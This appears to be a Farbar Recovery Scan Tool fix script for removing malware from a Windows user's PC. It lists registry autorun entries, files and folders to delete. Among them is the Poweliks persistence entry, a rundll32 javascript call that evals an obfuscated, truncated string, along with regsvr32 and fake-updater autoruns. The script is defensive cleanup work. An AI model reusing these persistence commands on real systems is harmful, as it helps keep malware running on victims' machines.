HKU\S-1-5-19\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
HKU\S-1-5-20\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
HKU\S-1-5-21-4001245620-4163921732-3684489738-1001\...\Run: [Yftlvkwxrffc] => regsvr32.exe /s "C:\Users\pcrow\AppData\Local\Microsoft\Yftlvkwxrffc.dll" <===== ATTENTION
HKU\S-1-5-21-4001245620-4163921732-3684489738-1001\...\Run: [GoogleUpdate] => C:\Users\pcrow\AppData\Roaming\FrameworkUpdate7\GoogleUpdate.exe [20747520 2014-11-14] ()
HKU\S-1-5-21-4001245620-4163921732-3684489738-1001\...\MountPoints2: {45092f40-94ac-11e2-be69-806e6f6e6963} - "E:\Installer.exe"
HKU\S-1-5-21-4001245620-4163921732-3684489738-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-18\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
Startup: C:\Users\pcrow\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winup.lnk
ShortcutTarget: winup.lnk -> C:\Users\pcrow\AppData\Roaming\Adobe\winup.exe ()
SearchScopes: HKU\S-1-5-21-4001245620-4163921732-3684489738-1001 -> DefaultScope {890DD081-0B40-4192-8A6F-F4AC250895BE} URL =
SearchScopes: HKU\S-1-5-21-4001245620-4163921732-3684489738-1001 -> {890DD081-0B40-4192-8A6F-F4AC250895BE} URL =
CHR HKLM-x32\...\Chrome\Extension: [edmgmpmklgfbohogafcfobonnkogchec] - C:\Program Files (x86)\Common Files\Motive\extensions\MotiveRequest.crx [2013-10-02]
2014-11-14 17:24 - 2014-11-19 17:20 - 00000000 _____ () C:\ProgramData\@system.temp
2014-11-14 17:24 - 2014-11-15 13:25 - 00000256 ____H () C:\ProgramData\@system3.att
2014-11-14 17:24 - 2014-11-14 17:24 - 00000480 ____H () C:\Users\pcrow\AppData\Roaming\麽鎒駓覜
2014-11-14 17:24 - 2014-11-14 17:24 - 00000000 ____D () C:\Users\pcrow\AppData\Roaming\FrameworkUpdate7
2014-11-14 17:23 - 2014-11-14 17:23 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
CustomCLSID: HKU\S-1-5-21-4001245620-4163921732-3684489738-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
C:\Users\pcrow\AppData\Local\Microsoft\Yftlvkwxrffc.dll
C:\Users\pcrow\AppData\Roaming\Adobe\winup.exe
C:\ProgramData\Microsoft\PlayReady\Fgadlgfzxf
C:\Users\pcrow\AppData\Roaming\FrameworkUpdate7
EmptyTemp:
CMD: bitsadmin /reset /allusers